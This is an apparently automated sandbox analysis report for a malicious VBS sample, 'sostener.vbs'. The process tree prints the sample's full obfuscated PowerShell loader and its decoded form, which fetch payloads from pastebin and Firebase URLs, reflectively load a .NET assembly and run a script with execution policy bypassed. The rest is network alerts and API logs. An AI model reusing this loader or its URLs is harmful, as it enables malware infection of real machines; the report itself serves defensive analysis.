popup
Summary | ZeroBOX
  1. Home
  2. Result
  3. Report
  4. Detail Analysis

sostener.vbs

Generic Malware Antivirus Hide_URL PowerShell
  1. Resubmit sample
Category Machine Started Completed
FILE s1_win7_x6401 April 10, 2025, 10:53 a.m. April 10, 2025, 10:59 a.m.
Size 8.5MB
Type Little-endian UTF-16 Unicode text, with CRLF line terminators
MD5 3861979388aa73c77bdd87a2b31214b7
SHA256 e9422fea4980e97109373e5a46aaaf98015e4307992cce12f86c6cfdaaa5aa42
CRC32 D7CA69C9
ssdeep 192:HXEXcXEXcXEXcXEXcXEXcXEXcXEXcXEXcXEXcXEXcXEXcXEXcXEXcXEXcXEXcXEE:/Qb7SOE97cM+drBm
Yara
  • Antivirus - Contains references to security software

  • wscript.exe "C:\Windows\System32\wscript.exe" C:\Users\test22\AppData\Local\Temp\sostener.vbs

    2644

    • powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $IuJUJJZz = 'WwBT★Hk★cwB0★GU★bQ★u★E4★ZQB0★C4★UwBl★HI★dgBp★GM★ZQBQ★G8★aQBu★HQ★TQBh★G4★YQBn★GU★cgBd★Do★OgBT★GU★YwB1★HI★aQB0★Hk★U★By★G8★d★Bv★GM★bwBs★C★★PQ★g★Fs★UwB5★HM★d★Bl★G0★LgBO★GU★d★★u★FM★ZQBj★HU★cgBp★HQ★eQBQ★HI★bwB0★G8★YwBv★Gw★V★B5★H★★ZQBd★Do★OgBU★Gw★cw★x★DI★Ow★k★Ho★RgBL★GE★QQ★g★D0★I★★n★Gg★d★B0★H★★cw★6★C8★LwBw★GE★cwB0★GU★YgBp★G4★LgBj★G8★bQ★v★HI★YQB3★C8★c★B6★Fg★RwBr★GE★eQBV★Cc★I★★7★CQ★SQBl★H★★RwBR★C★★PQ★g★Cg★I★Bb★FM★eQBz★HQ★ZQBt★C4★SQBP★C4★U★Bh★HQ★a★Bd★Do★OgBH★GU★d★BU★GU★bQBw★F★★YQB0★Gg★K★★p★C★★Kw★g★Cc★Z★Bs★Gw★M★★x★C4★d★B4★HQ★Jw★p★Ds★J★B3★GU★YgBD★Gw★aQBl★G4★d★★g★D0★I★BO★GU★dw★t★E8★YgBq★GU★YwB0★C★★UwB5★HM★d★Bl★G0★LgBO★GU★d★★u★Fc★ZQBi★EM★b★Bp★GU★bgB0★C★★Ow★k★FI★VgBV★Fg★dg★g★D0★I★★k★Hc★ZQBi★EM★b★Bp★GU★bgB0★C4★R★Bv★Hc★bgBs★G8★YQBk★FM★d★By★Gk★bgBn★Cg★I★★k★Ho★RgBL★GE★QQ★g★Ck★I★★7★CQ★UgBW★FU★W★B2★C★★f★★g★E8★dQB0★C0★RgBp★Gw★ZQ★g★C0★RgBp★Gw★ZQBQ★GE★d★Bo★C★★J★BJ★GU★c★BH★FE★I★★t★EU★bgBj★G8★Z★Bp★G4★Zw★g★Cc★VQBU★EY★O★★n★C★★LQBm★G8★cgBj★GU★I★★7★CQ★UwBU★GY★RwBs★C★★PQ★g★Cg★I★Bb★FM★eQBz★HQ★ZQBt★C4★SQBP★C4★U★Bh★HQ★a★Bd★Do★OgBH★GU★d★BU★GU★bQBw★F★★YQB0★Gg★K★★p★C★★Kw★g★Cc★Z★Bs★Gw★M★★y★C4★d★B4★HQ★Jw★p★C★★Ow★k★F★★a★By★Gw★Tg★g★D0★I★BO★GU★dw★t★E8★YgBq★GU★YwB0★C★★UwB5★HM★d★Bl★G0★LgBO★GU★d★★u★Fc★ZQBi★EM★b★Bp★GU★bgB0★C★★Ow★k★F★★a★By★Gw★Tg★u★EU★bgBj★G8★Z★Bp★G4★Zw★g★D0★I★Bb★FM★eQBz★HQ★ZQBt★C4★V★Bl★Hg★d★★u★EU★bgBj★G8★Z★Bp★G4★ZwBd★Do★OgBV★FQ★Rg★4★C★★Ow★k★EQ★S★B6★FU★QQ★g★C★★PQ★g★Cg★I★BH★GU★d★★t★EM★bwBu★HQ★ZQBu★HQ★I★★t★F★★YQB0★Gg★I★★k★Ek★ZQBw★Ec★UQ★g★Ck★I★★7★CQ★dQBU★Gw★S★B6★C★★PQ★g★CQ★U★Bo★HI★b★BO★C4★R★Bv★Hc★bgBs★G8★YQBk★FM★d★By★Gk★bgBn★Cg★I★★k★EQ★S★B6★FU★QQ★g★Ck★I★★7★CQ★dQBU★Gw★S★B6★C★★f★★g★E8★dQB0★C0★RgBp★Gw★ZQ★g★C0★RgBp★Gw★ZQBQ★GE★d★Bo★C★★J★BT★FQ★ZgBH★Gw★I★★t★GY★bwBy★GM★ZQ★g★Ds★J★BN★E8★R★BS★Gc★I★★9★C★★I★★n★CQ★cgB5★GE★ZQBH★C★★PQ★g★Cg★RwBl★HQ★LQBD★G8★bgB0★GU★bgB0★C★★LQBQ★GE★d★Bo★C★★Jw★n★Cc★I★★r★C★★J★BT★FQ★ZgBH★Gw★I★★r★C★★Jw★n★Cc★I★★t★EU★bgBj★G8★Z★Bp★G4★Zw★g★FU★V★BG★Dg★KQ★7★Cc★I★★7★CQ★TQBP★EQ★UgBn★C★★Kw★9★C★★JwBb★EI★eQB0★GU★WwBd★F0★I★★k★EY★eQBm★GQ★eg★g★D0★I★Bb★HM★eQBz★HQ★ZQBt★C4★QwBv★G4★dgBl★HI★d★Bd★Do★OgBG★HI★bwBt★EI★YQBz★GU★Ng★0★FM★d★By★Gk★bgBn★Cg★I★★k★HI★eQBh★GU★Rw★u★HI★ZQBw★Gw★YQBj★GU★K★★n★Cc★J★★k★CQ★J★★n★Cc★L★★n★Cc★QQ★n★Cc★KQ★g★Ck★I★★7★Cc★I★★7★CQ★TQBP★EQ★UgBn★C★★Kw★9★C★★JwBb★FM★eQBz★HQ★ZQBt★C4★QQBw★H★★R★Bv★G0★YQBp★G4★XQ★6★Cc★I★★r★C★★Jw★6★EM★dQBy★HI★ZQBu★HQ★R★Bv★G0★YQBp★G4★LgBM★G8★YQBk★Cg★I★★k★EY★eQBm★GQ★eg★g★Ck★Lg★n★C★★Ow★k★E0★TwBE★FI★Zw★g★Cs★PQ★g★Cc★RwBl★HQ★V★B5★H★★ZQ★o★C★★Jw★n★E0★aQBz★GU★cgBp★GM★bwBy★GQ★aQBv★HM★bwBB★G0★ZQBu★C4★QwBs★GE★cwBz★DE★Jw★n★C★★KQ★u★Ec★ZQB0★E0★Jw★g★Ds★J★BN★E8★R★BS★Gc★I★★r★D0★I★★n★GU★d★Bo★G8★Z★★o★C★★Jw★n★E0★cwBx★EI★SQBi★Fk★Jw★n★C★★KQ★u★Ek★bgB2★G8★awBl★Cg★I★★k★G4★dQBs★Gw★I★★s★C★★WwBv★GI★agBl★GM★d★Bb★F0★XQ★g★Cg★I★★n★Cc★M★★v★Dc★Rw★y★F★★eQBG★Es★V★★v★GQ★LwBl★GU★LgBl★HQ★cwBh★H★★Lw★v★Do★cwBw★HQ★d★Bo★Cc★Jw★g★Cw★I★★n★Cc★JQBK★Gs★UQBh★HM★R★Bm★Gc★cgBU★Gc★JQ★n★Cc★I★★s★C★★Jw★n★F8★XwBf★F8★XwBf★F8★XwBf★F8★XwBf★F8★XwBf★F8★XwBf★F8★XwBf★F8★XwBf★F8★XwBf★F8★XwBf★F8★XwBf★F8★XwBf★F8★XwBf★F8★XwBf★F8★Xw★t★C0★LQ★t★C0★LQ★t★Cc★Jw★s★C★★Jw★n★D★★Jw★n★Cw★I★★n★Cc★MQ★n★Cc★L★★g★Cc★JwBS★G8★Z★Bh★Cc★Jw★g★C★★KQ★g★Ck★I★★7★Cc★I★★7★CQ★VgBC★Fc★VwB6★C★★PQ★g★Cg★I★Bb★FM★eQBz★HQ★ZQBt★C4★SQBP★C4★U★Bh★HQ★a★Bd★Do★OgBH★GU★d★BU★GU★bQBw★F★★YQB0★Gg★K★★p★C★★Kw★g★Cc★Z★Bs★Gw★M★★z★C4★c★Bz★DE★Jw★g★Ck★I★★7★CQ★TQBP★EQ★UgBn★C★★f★★g★E8★dQB0★C0★RgBp★Gw★ZQ★g★C0★RgBp★Gw★ZQBQ★GE★d★Bo★C★★J★BW★EI★VwBX★Ho★I★★g★C0★ZgBv★HI★YwBl★C★★OwBw★G8★dwBl★HI★cwBo★GU★b★Bs★C★★LQBF★Hg★ZQBj★HU★d★Bp★G8★bgBQ★G8★b★Bp★GM★eQ★g★EI★eQBw★GE★cwBz★C★★LQBG★Gk★b★Bl★C★★J★BW★EI★VwBX★Ho★I★★7★★==';$Yolopolhggobek = [system.Text.Encoding]::Unicode.GetString( [system.Convert]::FromBase64String( $IuJUJJZz.replace('★','A') ) );$Yolopolhggobek = $Yolopolhggobek.replace('%JkQasDfgrTg%', 'C:\Users\test22\AppData\Local\Temp\sostener.vbs');powershell $Yolopolhggobek;

      2776

      • powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12;$zFKaA = 'https://pastebin.com/raw/pzXGkayU' ;$IepGQ = ( [System.IO.Path]::GetTempPath() + 'dll01.txt');$webClient = New-Object System.Net.WebClient ;$RVUXv = $webClient.DownloadString( $zFKaA ) ;$RVUXv | Out-File -FilePath $IepGQ -Encoding 'UTF8' -force ;$STfGl = ( [System.IO.Path]::GetTempPath() + 'dll02.txt') ;$PhrlN = New-Object System.Net.WebClient ;$PhrlN.Encoding = [System.Text.Encoding]::UTF8 ;$DHzUA = ( Get-Content -Path $IepGQ ) ;$uTlHz = $PhrlN.DownloadString( $DHzUA ) ;$uTlHz | Out-File -FilePath $STfGl -force ;$MODRg = '$ryaeG = (Get-Content -Path ''' + $STfGl + ''' -Encoding UTF8);' ;$MODRg += '[Byte[]] $Fyfdz = [system.Convert]::FromBase64String( $ryaeG.replace(''$$$$'',''A'') ) ;' ;$MODRg += '[System.AppDomain]:' + ':CurrentDomain.Load( $Fyfdz ).' ;$MODRg += 'GetType( ''MisericordiosoAmen.Class1'' ).GetM' ;$MODRg += 'ethod( ''MsqBIbY'' ).Invoke( $null , [object[]] ( ''0/7G2PyFKT/d/ee.etsap//:sptth'' , ''C:\Users\test22\AppData\Local\Temp\sostener.vbs'' , ''____________________________________________-------'', ''0'', ''1'', ''Roda'' ) ) ;' ;$VBWWz = ( [System.IO.Path]::GetTempPath() + 'dll03.ps1' ) ;$MODRg | Out-File -FilePath $VBWWz -force ;powershell -ExecutionPolicy Bypass -File $VBWWz ;"

        2876

Suricata Alerts

Flow SID Signature Category
TCP 192.168.56.101:49166 -> 142.250.198.202:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49165 -> 104.22.68.199:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined

Suricata TLS

Flow Issuer Subject Fingerprint
TLSv1
192.168.56.101:49166
142.250.198.202:443 		C=US, O=Google Trust Services, CN=WE2 CN=upload.video.google.com 62:3a:f6:bd:3a:0b:ed:3b:16:28:ba:75:d2:00:cf:50:37:6c:20:50
TLSv1
192.168.56.101:49165
104.22.68.199:443 		C=US, O=Google Trust Services, CN=WR1 CN=pastebin.com 23:0a:6d:10:e8:e5:69:5e:8b:b3:d5:f7:68:b4:87:dc:57:ae:82:c7

Time & API Arguments Status Return Repeated

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameA

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameA

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameA

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0
Time & API Arguments Status Return Repeated

IsDebuggerPresent

 0 0

IsDebuggerPresent

 0 0

IsDebuggerPresent

 0 0
Time & API Arguments Status Return Repeated

WriteConsoleW

 buffer: Exception setting "SecurityProtocol": "Cannot convert null to type "System.Net.
console_handle: 0x00000023
1 1 0

WriteConsoleW

 buffer: SecurityProtocolType" due to invalid enumeration values. Specify one of the fol
console_handle: 0x0000002f
1 1 0

WriteConsoleW

 buffer: lowing enumeration values and try again. The possible enumeration values are "S
console_handle: 0x0000003b
1 1 0

WriteConsoleW

 buffer: sl3, Tls"."
console_handle: 0x00000047
1 1 0

WriteConsoleW

 buffer: At line:1 char:35
console_handle: 0x00000053
1 1 0

WriteConsoleW

 buffer: + [System.Net.ServicePointManager]:: <<<< SecurityProtocol = [System.Net.Securi
console_handle: 0x0000005f
1 1 0

WriteConsoleW

 buffer: tyProtocolType]::Tls12;$zFKaA = 'https://pastebin.com/raw/pzXGkayU' ;$IepGQ = (
console_handle: 0x0000006b
1 1 0

WriteConsoleW

 buffer: [System.IO.Path]::GetTempPath() + 'dll01.txt');$webClient = New-Object System.
console_handle: 0x00000077
1 1 0

WriteConsoleW

 buffer: Net.WebClient ;$RVUXv = $webClient.DownloadString( $zFKaA ) ;$RVUXv | Out-File
console_handle: 0x00000083
1 1 0

WriteConsoleW

 buffer: -FilePath $IepGQ -Encoding 'UTF8' -force ;$STfGl = ( [System.IO.Path]::GetTempP
console_handle: 0x0000008f
1 1 0

WriteConsoleW

 buffer: ath() + 'dll02.txt') ;$PhrlN = New-Object System.Net.WebClient ;$PhrlN.Encoding
console_handle: 0x0000009b
1 1 0

WriteConsoleW

 buffer: = [System.Text.Encoding]::UTF8 ;$DHzUA = ( Get-Content -Path $IepGQ ) ;$uTlHz
console_handle: 0x000000a7
1 1 0

WriteConsoleW

 buffer: = $PhrlN.DownloadString( $DHzUA ) ;$uTlHz | Out-File -FilePath $STfGl -force ;
console_handle: 0x000000b3
1 1 0

WriteConsoleW

 buffer: $MODRg = '$ryaeG = (Get-Content -Path ''' + $STfGl + ''' -Encoding UTF8);' ;$M
console_handle: 0x000000bf
1 1 0

WriteConsoleW

 buffer: ODRg += '[Byte[]] $Fyfdz = [system.Convert]::FromBase64String( $ryaeG.replace('
console_handle: 0x000000cb
1 1 0

WriteConsoleW

 buffer: '$$$$'',''A'') ) ;' ;$MODRg += '[System.AppDomain]:' + ':CurrentDomain.Load( $F
console_handle: 0x000000d7
1 1 0

WriteConsoleW

 buffer: yfdz ).' ;$MODRg += 'GetType( ''MisericordiosoAmen.Class1'' ).GetM' ;$MODRg +=
console_handle: 0x000000e3
1 1 0

WriteConsoleW

 buffer: 'ethod( ''MsqBIbY'' ).Invoke( $null , [object[]] ( ''0/7G2PyFKT/d/ee.etsap//:sp
console_handle: 0x000000ef
1 1 0

WriteConsoleW

 buffer: tth'' , ''C:\Users\test22\AppData\Local\Temp\sostener.vbs'' , ''_______________
console_handle: 0x000000fb
1 1 0

WriteConsoleW

 buffer: _____________________________-------'', ''0'', ''1'', ''Roda'' ) ) ;' ;$VBWWz
console_handle: 0x00000107
1 1 0

WriteConsoleW

 buffer: = ( [System.IO.Path]::GetTempPath() + 'dll03.ps1' ) ;$MODRg | Out-File -FilePat
console_handle: 0x00000113
1 1 0

WriteConsoleW

 buffer: h $VBWWz -force ;powershell -ExecutionPolicy Bypass -File $VBWWz ;
console_handle: 0x0000011f
1 1 0

WriteConsoleW

 buffer: + CategoryInfo : InvalidOperation: (:) [], RuntimeException
console_handle: 0x0000012b
1 1 0

WriteConsoleW

 buffer: + FullyQualifiedErrorId : PropertyAssignmentException
console_handle: 0x00000137
1 1 0

WriteConsoleW

 buffer: Exception calling "DownloadString" with "1" argument(s): "The remote server ret
console_handle: 0x000000bf
1 1 0

WriteConsoleW

 buffer: urned an error: (400) Bad Request."
console_handle: 0x00000057
1 1 0

WriteConsoleW

 buffer: At line:1 char:570
console_handle: 0x00000017
1 1 0

WriteConsoleW

 buffer: + [System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProt
console_handle: 0x00000027
1 1 0

WriteConsoleW

 buffer: ocolType]::Tls12;$zFKaA = 'https://pastebin.com/raw/pzXGkayU' ;$IepGQ = ( [Syst
console_handle: 0x00000033
1 1 0

WriteConsoleW

 buffer: em.IO.Path]::GetTempPath() + 'dll01.txt');$webClient = New-Object System.Net.We
console_handle: 0x0000003f
1 1 0

WriteConsoleW

 buffer: bClient ;$RVUXv = $webClient.DownloadString( $zFKaA ) ;$RVUXv | Out-File -FileP
console_handle: 0x0000004b
1 1 0

WriteConsoleW

 buffer: ath $IepGQ -Encoding 'UTF8' -force ;$STfGl = ( [System.IO.Path]::GetTempPath()
console_handle: 0x00000057
1 1 0

WriteConsoleW

 buffer: + 'dll02.txt') ;$PhrlN = New-Object System.Net.WebClient ;$PhrlN.Encoding = [Sy
console_handle: 0x00000063
1 1 0

WriteConsoleW

 buffer: stem.Text.Encoding]::UTF8 ;$DHzUA = ( Get-Content -Path $IepGQ ) ;$uTlHz = $Ph
console_handle: 0x0000006f
1 1 0

WriteConsoleW

 buffer: rlN.DownloadString <<<< ( $DHzUA ) ;$uTlHz | Out-File -FilePath $STfGl -force ;
console_handle: 0x0000007b
1 1 0

WriteConsoleW

 buffer: $MODRg = '$ryaeG = (Get-Content -Path ''' + $STfGl + ''' -Encoding UTF8);' ;$M
console_handle: 0x00000093
1 1 0

WriteConsoleW

 buffer: ODRg += '[Byte[]] $Fyfdz = [system.Convert]::FromBase64String( $ryaeG.replace('
console_handle: 0x0000009f
1 1 0

WriteConsoleW

 buffer: '$$$$'',''A'') ) ;' ;$MODRg += '[System.AppDomain]:' + ':CurrentDomain.Load( $F
console_handle: 0x000000ab
1 1 0

WriteConsoleW

 buffer: yfdz ).' ;$MODRg += 'GetType( ''MisericordiosoAmen.Class1'' ).GetM' ;$MODRg +=
console_handle: 0x000000b7
1 1 0

WriteConsoleW

 buffer: 'ethod( ''MsqBIbY'' ).Invoke( $null , [object[]] ( ''0/7G2PyFKT/d/ee.etsap//:sp
console_handle: 0x000000c3
1 1 0

WriteConsoleW

 buffer: tth'' , ''C:\Users\test22\AppData\Local\Temp\sostener.vbs'' , ''_______________
console_handle: 0x000000cf
1 1 0

WriteConsoleW

 buffer: _____________________________-------'', ''0'', ''1'', ''Roda'' ) ) ;' ;$VBWWz
console_handle: 0x000000df
1 1 0

WriteConsoleW

 buffer: = ( [System.IO.Path]::GetTempPath() + 'dll03.ps1' ) ;$MODRg | Out-File -FilePat
console_handle: 0x000000fb
1 1 0

WriteConsoleW

 buffer: h $VBWWz -force ;powershell -ExecutionPolicy Bypass -File $VBWWz ;
console_handle: 0x00000107
1 1 0

WriteConsoleW

 buffer: + CategoryInfo : NotSpecified: (:) [], MethodInvocationException
console_handle: 0x00000113
1 1 0

WriteConsoleW

 buffer: + FullyQualifiedErrorId : DotNetMethodException
console_handle: 0x0000011f
1 1 0

WriteConsoleW

 buffer: You cannot call a method on a null-valued expression.
console_handle: 0x00000023
1 1 0

WriteConsoleW

 buffer: At C:\Users\test22\AppData\Local\Temp\dll03.ps1:1 char:160
console_handle: 0x0000002f
1 1 0

WriteConsoleW

 buffer: + $ryaeG = (Get-Content -Path 'C:\Users\test22\AppData\Local\Temp\dll02.txt' -E
console_handle: 0x0000003b
1 1 0

WriteConsoleW

 buffer: ncoding UTF8);[Byte[]] $Fyfdz = [system.Convert]::FromBase64String( $ryaeG.repl
console_handle: 0x00000047
1 1 0
Time & API Arguments Status Return Repeated

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00411470
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00411f30
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00411f30
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00411f30
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00411630
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00411630
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00411630
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00411630
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00411630
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00411630
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x004119b0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x004119b0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x004119b0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00411f30
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00411f30
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00411f30
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x004115f0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00411f30
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00411f30
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00411f30
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00411f30
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00411f30
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00411f30
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00411f30
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00411230
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00411230
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00411230
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00411230
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00411230
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00411230
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00411230
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00411230
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00411230
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00411230
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00411230
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00411230
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00411230
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00411230
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00411eb0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00411eb0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0075ebd0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0075f2d0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0075f2d0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0075f2d0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0075f590
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0075f590
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0075f590
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0075f590
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0075f590
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0075f590
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0
Time & API Arguments Status Return Repeated

GlobalMemoryStatusEx

 1 1 0
suspicious_features GET method with no useragent header suspicious_request GET https://pastebin.com/raw/pzXGkayU
suspicious_features GET method with no useragent header suspicious_request GET https://firebasestorage.googleapis.com/v0/b/rodriakd-8413d.appspot.com/o/dll/rodadll.txt?alt=media&token=aa0328ac-1aba-4a7b-89a6-42621f5aa921
request GET https://pastebin.com/raw/pzXGkayU
request GET https://firebasestorage.googleapis.com/v0/b/rodriakd-8413d.appspot.com/o/dll/rodadll.txt?alt=media&token=aa0328ac-1aba-4a7b-89a6-42621f5aa921
Time & API Arguments Status Return Repeated

NtAllocateVirtualMemory

 process_identifier: 2776
region_size: 1048576
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02900000
allocation_type: 8192 (MEM_RESERVE)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2776
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x029c0000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2776
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x72891000
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2776
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0266a000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2776
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 8192
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x72892000
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2776
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02662000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2776
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
